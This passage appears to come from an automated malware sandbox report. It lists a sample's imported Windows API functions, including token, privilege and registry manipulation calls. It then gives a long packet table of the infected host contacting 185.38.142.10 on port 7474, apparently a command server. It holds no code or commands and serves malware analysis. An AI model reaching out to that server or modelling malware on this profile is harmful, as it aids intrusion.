DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 28, 2024 08:57:53.178724051 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:57:53.183687925 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:53.183784962 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:57:53.199131012 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:57:53.204066038 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:53.557035923 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:57:53.561949015 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:53.821779013 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:53.869379044 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:57:53.958580017 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:54.009955883 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:57:59.015821934 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:57:59.023334980 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:59.194338083 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:59.194556952 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:57:59.199383020 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:59.387831926 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:59.387851954 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:59.387864113 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:59.387877941 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:59.387890100 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:57:59.387983084 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:57:59.388032913 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:01.922800064 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:01.923103094 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:01.928455114 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:01.928467989 CEST	7474	49731	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:01.928541899 CEST	49731	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:01.928564072 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:01.929200888 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:01.934516907 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.275923014 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.280921936 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.280961990 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.280966997 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.280977964 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.280982971 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.281004906 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.281009912 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.281018972 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.281059027 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.281076908 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.281083107 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.281122923 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.281146049 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.285973072 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.285979033 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.285999060 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.286003113 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.286020994 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.286030054 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.286041975 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.286092043 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.333369017 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.333553076 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.381460905 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.381578922 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.390785933 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.390939951 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.396306038 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396311998 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396322966 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396327019 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396358013 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396362066 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396365881 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396368980 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.396373034 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396398067 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.396404028 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396414995 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396424055 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396434069 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396437883 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396459103 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.396477938 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.396521091 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396526098 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.396528006 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396552086 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396557093 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396600962 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396605968 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396614075 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.396656036 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.396668911 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396673918 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396682978 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396699905 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396754026 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.396769047 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396775007 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.396846056 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.396888018 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.397005081 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.403917074 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.404139996 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.404237986 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.404270887 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409315109 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409338951 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409374952 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409390926 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409393072 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409394979 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409405947 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409410954 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409447908 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409451962 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409468889 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409478903 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409491062 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409509897 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409523010 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409533978 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409538984 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409542084 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409548044 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409584045 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409589052 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409594059 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409603119 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409632921 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409662008 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409666061 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409676075 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409679890 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409693956 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409698009 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409703970 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409727097 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409737110 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409743071 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409749985 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409790993 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409796000 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409805059 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409849882 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409857988 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409862995 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409919024 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.409962893 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.409966946 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410020113 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410166979 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410171986 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410183907 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410187960 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410197973 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410202026 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410206079 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410214901 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410222054 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410240889 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410244942 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410259008 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410263062 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410270929 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410300970 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410305977 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410306931 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410322905 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410330057 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410355091 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410357952 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410360098 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410401106 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410404921 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410407066 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410446882 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410451889 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410466909 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410504103 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410599947 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410604954 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410614014 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410618067 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410621881 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410634041 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410636902 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410646915 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410676003 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410681009 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410686016 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410726070 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410774946 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410779953 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410789967 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410793066 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410811901 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410816908 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410841942 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410873890 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410895109 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410908937 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410957098 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.410958052 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410964966 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410974979 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410979033 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.410986900 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.411016941 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.411056995 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.411076069 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.411079884 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.411088943 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.411092043 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.411101103 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.411104918 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.411124945 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.411168098 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.411242008 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.411267996 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.411290884 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.411324024 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414231062 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414304972 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414310932 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414319992 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414324045 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414333105 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414350986 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414356947 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414383888 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414411068 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414424896 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414431095 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414439917 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414473057 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414482117 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414494038 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414505005 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414525986 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414527893 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414540052 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414566994 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414582968 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414587975 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414597034 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414629936 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414633989 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414649010 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414661884 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414690018 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414696932 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414709091 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414753914 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414760113 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414778948 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414793968 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414798975 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414802074 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414815903 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414820910 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414829969 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414839029 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414853096 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414868116 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414896965 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414896965 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414901972 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414906979 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414949894 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414954901 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.414956093 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.414963961 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415007114 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415011883 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415011883 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.415020943 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415028095 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415040970 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.415066004 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415067911 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.415071011 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415080070 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415096045 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.415123940 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.415138960 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.415270090 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415323973 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.415344954 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415349960 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415359020 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415371895 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415422916 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.415469885 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415473938 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415483952 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415488005 CEST	7474	49733	185.38.142.10	192.168.2.4
